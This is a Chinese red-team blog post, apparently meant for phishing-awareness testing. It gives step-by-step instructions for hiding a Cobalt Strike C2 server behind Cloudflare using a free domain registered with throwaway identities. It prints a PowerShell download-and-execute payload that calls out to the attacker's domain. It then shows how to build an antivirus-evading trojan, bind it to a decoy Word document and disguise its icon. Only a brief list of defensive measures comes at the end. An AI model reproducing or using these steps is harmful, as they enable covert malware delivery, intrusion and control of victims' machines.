九维团队-红队（突破）| 安全意识提升之钓鱼邮件打造测试

近几年，随着攻防技术的不断发展，钓鱼邮件的制作和传播变得越来越容易。网络犯罪分子可以使用高度专业化的工具和技巧，制作逼真的钓鱼邮件，致使普通用户难以辨别。随着钓鱼邮件的形式不断演化，研究人员需要跟踪新的钓鱼手法和变种，以及研究破解和防御策略。

本文通过使用CDN对自己的CS进行隐匿，并且通过制作免杀马进行钓鱼邮件测试攻击，以此来测试是否能识别和检测到钓鱼邮件，提高大家的网络安全意识。

要想使用CDN，首先需要注册一个域名。这里笔者为大家推荐一个免费域名注册网址：

https://www.freenom.com/zh/index.html?lang=zh

*左右滑动查看更多

CDN地址：

https://dash.cloudflare.com/

注册域名参考步骤如下：

打开上文提到的免费域名注册网址，随便输入任意域名查看可用性，然后点击“完成”。

这时网站会跳转到选择时长页面（小提示：超过12个月就需要付费了）。

选择12个月，然后点击“Continue”，网站将会直接跳转到注册页面。

使用临时邮箱进行注册：

https://temp-mail.org/zh

邮箱收到链接：

点击链接进行注册：

这里可以使用haoweichi进行注册，要注意VPN的地址最好和你注册的地址属于同地区：

haoweichi网址：http://haoweichi.com

出现如下结果就说明成功了：

接下来注册cloudflare，登录后输入上边步骤中注册成功的站点。

选择免费计划：

复制cloudflare的名称服务器地址：

登录freenom，打开My Domains->ManageDomain->Management Tools->Nameservers，选择Usecustom nameservers (enter below)，填写名称服务器。

点击“Change Nameservers”后，刷新等待cloudflare配置成功。

接下来配置CS https上线。

打开Cloudflare，配置SSL/TLS加密模式为完全。

配置缓存，开启AlwaysOnline及开发模式。

打开SSL/TLS的源服务器创建源证书。

创建使用Cloudflare生成私钥和CSR，复制出源证书及私钥，保存为server.pem和server.key文件。

使用以下命令重新生成store格式配置文件。

生成.p12格式文件命令：

openssl pkcs12 -export -in server.pem -inkey server.key -out spoofdomain.p12 -name 域名 -passout pass:密码

*左右滑动查看更多

示例：

openssl pkcs12 -export -in server.pem -inkey server.key -out spoofdomain.p12 -name zh.alilibaba.tk -passout pass:LNH@123

*左右滑动查看更多

生成.store格式文件命令：

keytool -importkeystore -deststorepass 密码 -destkeypass 密码 -destkeystore cs.store -srckeystore spoofdomain.p12 -srcstoretype PKCS12 -srcstorepass 密码 -alias 域名

*左右滑动查看更多

示例：

keytool -importkeystore -deststorepass LNH@123 -destkeypass LNH@123 -destkeystore cs.store -srckeystore spoofdomain.p12 -srcstoretype PKCS12 -srcstorepass LNH@123 -alias zh.alilibaba.tk

*左右滑动查看更多

C2.profile配置

在profile文件中添加以下配置：

https-certificate {    set keystore "cs.store";    set password "LNH@123";}

修改teamserver配置文件：

java -XX:ParallelGCThreads=4 -Dcobaltstrike.server_port=54321 -Dcobaltstrike.server_bindto=0.0.0.0 -Djavax.net.ssl.keyStore=./cs.store -Djavax.net.ssl.keyStorePassword=LNH@123 -server -XX:+AggressiveHeap -XX:+UseParallelGC -Xms512M -Xmx1024M -classpath ./cobaltstrike.jar server.TeamServer $*

*左右滑动查看更多

登录服务器开启cs：

要注意，Cloudflare只支持监听以下端口：

Cloudflare支持的HTTP端口是：

80,8080,8880,2052,2082,2086,2095

*左右滑动查看更多

Cloudflare支持的HTTPs端口是：

443,2053,2083,2087,2096,8443

*左右滑动查看更多

如果VPS是国内云主机，且注册的免费域名没有备案，则不能使用80、8080、443、8443端口提供服务。以下使用的是2096端口。

配置payload

示例：

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('https://XXXX.tk:2096/a'))"

*左右滑动查看更多

注：本项目使用的是开源的免杀制作工具，只做验证使用。

接下来制作免杀木马并且进行伪装，使用到的工具如下：

Cuiri：https://github.com/NyDubh3/CuiRi/releases/tag/v1.0GoFileBinder：https://github.com/Yihsiwei/GoFileBinderRestorator：一款修改exe执行程序图标的小工具

*左右滑动查看更多

首先生成payload：

记事本打开生成的文件，复制上shellcode到新的txt文档里：

将这个txt放在与cuiri_win64.exe同级的文件夹下。

打开cmd命令行：

cuiri_win64.exe -f 1.txt

成功在此文件夹生成hoshino.exe。

接下来捆绑操作。

将生成的免杀马放到和GoFileBinder.exe的根目录下。

然后命令：

GoFileBinder.exe hoshinoGen.exe test.doc

*左右滑动查看更多

在此目录下会生成捆绑文件Yihsiwei.exe。

运行Yihsiwei.exe，会弹出test.doc,并且木马上线。

木马自动迁移到了C盘Users下的Public里面。

至此免杀和捆绑制作完成，接下来为了更加逼真，我们给exe文件修改图标。

打开Restorator 2018 ，第一次打开需要注册，需要注册名和注册码。

名字：JuNoS

授权注册码：

拖入木马，然后拖入你想要修改的图标，接着右键复制图标文件夹，然后粘贴到你的木马文件上。

然后保存，发现图标已经变了。

成功上线：

1）为员工提供钓鱼邮件识别和应对培训，教育他们如何辨别可疑邮件、恶意链接和附件。

2）强调不要轻信来自未知发件人的邮件，特别是涉及金融交易或敏感信息的邮件。

1）使用高级的电子邮件过滤器和反垃圾邮件技术，可以帮助识别和隔离潜在的钓鱼邮件。

2）实施多因素认证（MFA）以加强对电子邮件账户的保护，减少账户被入侵的风险。

1）使用电子邮件身份验证标准如SPF (Sender Policy Framework)、DKIM (DomainKeys Identified Mail) 和 DMARC (Domain-based Message Authentication, Reporting, and Conformance)，以验证邮件发送者的真实性。

2）告知员工要注意来自未经身份验证的发件人的邮件。

1）确保操作系统、防病毒软件、电子邮件客户端等关键软件都得到及时的安全更新。

2）防止恶意软件通过已知漏洞入侵系统。

定期备份关键数据，并将备份存储在离线位置，以便在遭受勒索软件或数据泄露攻击时能够快速恢复数据。

1）实施网络流量监测和日志记录，以及异常行为检测，以及时识别和响应潜在的安全威胁。

2）建立报告机制，鼓励员工报告可疑活动。

1）要求员工使用强密码，并定期更改密码。

2）推荐使用密码管理工具来管理复杂的密码。

制定和执行严格的电子邮件使用和安全策略，包括限制外部邮件附件的访问和下载。

制定并测试网络安全事件的应急响应计划，以便在遭受钓鱼攻击时能够迅速采取行动，减少损失。

定期进行安全评估和渗透测试，以发现系统中的漏洞和弱点，然后加以修复。

以上这些防御和加固方案可以帮助组织降低受到钓鱼邮件攻击的风险，同时也强调了员工的安全意识和合规性对整体安全的重要性。组织应采取综合的安全措施，以应对不断演化的网络威胁。